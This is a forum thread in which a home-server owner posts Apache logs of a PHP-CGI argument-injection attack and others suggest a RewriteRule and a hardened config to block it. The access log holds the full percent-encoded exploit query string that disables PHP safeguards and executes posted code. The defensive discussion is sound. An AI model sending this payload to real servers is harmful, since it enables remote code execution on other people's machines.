[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] Premature end of script headers: php
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150]
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled.  This
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] means that a page will only be served up if the REDIRECT_STATUS CGI variable is
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] set, e.g. via an Apache Action directive.</p>
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p>
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <p>For more information about changing this behaviour or re-enabling this webserver,
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] consult the installation file that came with this distribution, or visit
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <a href="http://php.net/install.windows">the manual page</a>.</p>
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] Premature end of script headers: php5
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi
[Thu Oct 31 19:31:40 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php4
[Thu Oct 31 20:15:12 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi
[Thu Oct 31 20:15:12 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi
[Thu Oct 31 20:15:12 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php4
[Fri Nov 01 00:21:51 2013] [error] [client 5.79.78.230] script not found or unable to stat: /usr/lib/cgi-bin/php4
Usage: at [-V] [-q x] [-f file] [-mldbv] timespec ...
       at [-V] [-q x] [-f file] [-mldbv] -t time
       at -c job ...
       atq [-V] [-q x]
       atrm [-V] job ...
       batch
warning: commands will be executed using /bin/sh
access.log

Code:

208.84.156.150 - - [31/Oct/2013:19:31:38 +0100] "GET //cgi-bin/php HTTP/1.1" 500 640 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:39 +0100] "GET //cgi-bin/php5 HTTP/1.1" 500 640 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:39 +0100] "GET //cgi-bin/php-cgi HTTP/1.1" 404 470 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:39 +0100] "GET //cgi-bin/php.cgi HTTP/1.1" 404 470 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:40 +0100] "GET //cgi-bin/php4 HTTP/1.1" 404 469 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:20:15:03 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 319 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:08 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 319 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:12 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:12 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 495 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
208.84.156.150 - - [31/Oct/2013:20:15:12 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
Any thoughts?

Also I've got the same question as RandomUsername: Where should we be putting that regexp rule, Ubi?

/Daniel

Gordon
Posts: 1287
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon » 01 Nov 2013, 12:13

My guess is that it is a coincidence. But maybe you are in the same IP range as RandomUsername? These guys will typically run web scans to find vulnerable machines and there may or not be some apparent logic in their jumping from target to target.

The /cgi-bin/ alias is set in the vhost configuration, so that would be the obvious place to put it. You may however choose to create a separate file for this in Apache's conf.d folder, which will put it in the global configuration and stay untouched by future updates from Excito. Do note that the rewrite lines will only work if RewriteEngine is enabled, so they need to be preceded by a line that says "RewriteEngine on".
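Putting the pieces of this thread together as an added configuration example (not Excito's shipped bubba file): the <Directory> block RandomUsername quoted, with "Allow from all" replaced by a LAN-only allow list, and the RewriteCond/RewriteRule pair placed inside the same VirtualHost with RewriteEngine on. The 192.168.0.0/16 range and the assumption that the admin interface only needs /cgi-bin/ from the LAN are mine; adjust them. One caveat if you take the conf.d route instead: mod_rewrite does not hand server-level rules down to <VirtualHost> blocks unless each vhost says RewriteOptions Inherit, so a rule that lives only in conf.d may never fire for requests handled by a vhost.

```apache
# Added example, not Excito's shipped configuration. Both changes go inside
# the <VirtualHost> in /etc/apache2/sites-enabled/bubba (file layout assumed).

# Before (as quoted in this thread): any client on the internet may execute
# the php* CGI binaries in /usr/lib/cgi-bin.
#   <Directory "/usr/lib/cgi-bin">
#       Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
#       Order allow,deny
#       Allow from all
#   </Directory>

# After: keep the alias for whatever the admin UI needs, but only from
# localhost and the LAN (192.168.0.0/16 is an assumption; use your range).
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
    AllowOverride None
    Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
    Order deny,allow
    Deny from all
    Allow from 127.0.0.1 192.168.0.0/16
</Directory>

# The query-string rule from the thread, in the same <VirtualHost>.
# mod_cgi only turns a query string into argv when it contains no literal
# '=' (RFC 3875 section 4.4), which is what the [^=]+$ part keys on.
# %{QUERY_STRING} is matched raw (still percent-encoded), so [NC] is what
# makes %2d and %2D both hit.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

# If the rewrite lines live in a global file under conf.d instead, every
# <VirtualHost> must opt in, otherwise the rule is never consulted there:
#   RewriteEngine On
#   RewriteOptions Inherit
```

After editing, run `apache2ctl -t` and reload; then confirm from outside the LAN that `/cgi-bin/php` answers 403 rather than 500 or 200.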

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 01 Nov 2013, 13:53

The regexp goes into the VirtualHost part of the Apache config. And indeed, be sure RewriteEngine is on.

We should really get a test for this vulnerability so people can check if they are patched.
